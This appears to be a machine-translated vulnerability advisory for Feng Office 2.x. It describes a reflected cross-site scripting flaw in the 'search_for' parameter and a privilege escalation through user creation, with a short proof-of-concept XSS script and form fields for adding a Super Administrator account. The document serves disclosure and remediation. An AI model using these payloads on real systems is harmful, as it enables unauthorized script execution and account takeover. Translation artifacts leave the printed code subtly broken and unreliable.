Feng Office Cross-site scripting and unauthorized operations

Release date:
Updated on:

Affected Systems:
Feng Office 2.x
Description:
--------------------------------------------------------------------------------
Feng Office is an open-source Online Collaboration System developed using the BS architecture and php language.

Feng Office 2.2.1 and other versions have unauthorized operations and cross-site vulnerabilities. Malicious users can exploit these vulnerabilities to bypass certain security restrictions and execute script code.

1) pass to index. if the input of the "search_for" parameter in php (when the values of "a" and "c" are "search") is not properly filtered, it is returned to the user, this causes malicious HTML and script code to be executed during site browsing.

2) When creating a user, the application does not have the correct check permission. As a result, a user with the "Executive" permission can create a user without the permission.

<* Source: Ur0b0r0x

Link: http://secunia.com/advisories/51356/
Http://packetstormsecurity.org/files/118273/Feng-Office-2.0-Beta-3-XSS-Privilege-Escalation.html
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

# Proof of Concept Video
Http://www.youtube.com/watch? V = Q_ B _5VkAVhU

# Expl0it/P0c/Xss ###################
<SCRIPT> alert (String. fromCharCode (88,83, 83) </SCRIPT>

# Expl0it/P0c/Privilege Escalation ###################
<Input type = "hidden" value = "" name = "contact [new_contact_from_mail_div_id]">
<Input type = "hidden" value = "" name = "contact [hf_contacts]">
<Label for = "og_135425580_283914profileformfirstname"> First name:
<Input type = "text" value = "poc" name = "contact [first_name]" maxlength = "50" id = "og_135425580_283914profileformfirstname">
<Label for = "og_135425580_283914profileformsurname"> Last name:
<Input type = "text" value = "poc2" name = "contact [surname]" maxlength = "50" id = "og_135425580_283914profileformsurname">
<Label for = "og_135425580_283914profileformemail"> Email address: </label>
<Input type = "text" value = "poctest@live.com" name = "contact [email]" style = "width: 260px;" maxlength = "100" id = "og_135425580_283914profileformemail">
<Div style = "" class = "user-data">
<Label> Password: <input type = "password" name = "contact [user] [password]">
<Label> Repeat password: <input type = "password" name = "contact [user] [password_a]" class = "field-error">
<Select name = "contact [user] [type]">
<Option value = "1"> Super Administrator </option>
<Button tabindex = "20000" id = "og_1354251270_613002submit2" class = "submit" type = "submit" accesskey = "s"> Add Per <u> s </u> on </button>

Suggestion:
--------------------------------------------------------------------------------
Temporary solution:

If you cannot install or upgrade the patch immediately, NSFOCUS recommends that you take the following measures to reduce the threat:

* Encode the search_for parameter value in html before returning it to the user.

Vendor patch:

Feng Office
-----------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Www.fengoffice.com/